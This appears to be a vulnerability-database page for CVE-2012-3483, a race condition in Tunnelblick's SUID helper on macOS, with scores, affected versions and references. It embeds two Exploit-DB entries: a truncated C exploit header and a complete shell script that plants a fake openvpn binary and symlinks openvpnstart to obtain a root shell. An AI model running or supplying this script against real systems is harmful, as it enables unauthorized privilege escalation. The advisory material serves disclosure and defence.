CVE-2012-3483
published 2012-08-26CVE-2012-3483: Race condition in the runScript function in Tunnelblick 3.3beta20 and earlier allows local users to gain privileges by replacing a script file.
PriorityP423medium6.2CVSS 2.0
AVLACHAuNCCICAC
EXPLOIT
EPSS
0.26%
17.8th percentile
Race condition in the runScript function in Tunnelblick 3.3beta20 and earlier allows local users to gain privileges by replacing a script file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tunnelblick | <= 3.3beta20 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Tunnelblick - Local Privilege Escalation (1)
exploitdb·2012-08-11
CVE-2012-3483 Tunnelblick - Local Privilege Escalation (1)
Tunnelblick - Local Privilege Escalation (1)
---
/*
* ==== Pwnnel Blicker ====
* = =
* = zx2c4 =
* = =
* ========================
*
* Tunnel Blick, a widely used OpenVPN manager for OSX
* comes with a nice SUID executable that has more holes
* than you care to count. It's a treasure chest of local
* roots. I picked one that looked interesting, and here
* we have Pwnnel Blicker.
*
* Tunnel Blick will run any executable that has 744
* permissions and is owned by root:root. Probably we
* could find a way to exploit an already existing 744
* executable, but this would be too easy. So instead, we
* take advantage of a race condition between checking the
* file permissions on the executable and actually running
* it.
*
* Usage:
* $ ./a.out
* [+] Creating vulnerable directory.
* /Users/zx2c4/Li
Exploit-DB
Tunnelblick - Local Privilege Escalation (2)
exploitdb·2012-08-11
CVE-2012-3485 Tunnelblick - Local Privilege Escalation (2)
Tunnelblick - Local Privilege Escalation (2)
---
#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
# http://git.zx2c4.com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2012-08/0122.htmlhttp://code.google.com/p/tunnelblick/issues/detail?id=212http://git.zx2c4.com/Pwnnel-Blicker/tree/pwnnel-blicker.chttp://www.openwall.com/lists/oss-security/2012/08/14/1http://archives.neohapsis.com/archives/fulldisclosure/2012-08/0122.htmlhttp://code.google.com/p/tunnelblick/issues/detail?id=212http://git.zx2c4.com/Pwnnel-Blicker/tree/pwnnel-blicker.chttp://www.openwall.com/lists/oss-security/2012/08/14/1
2012-08-26
Published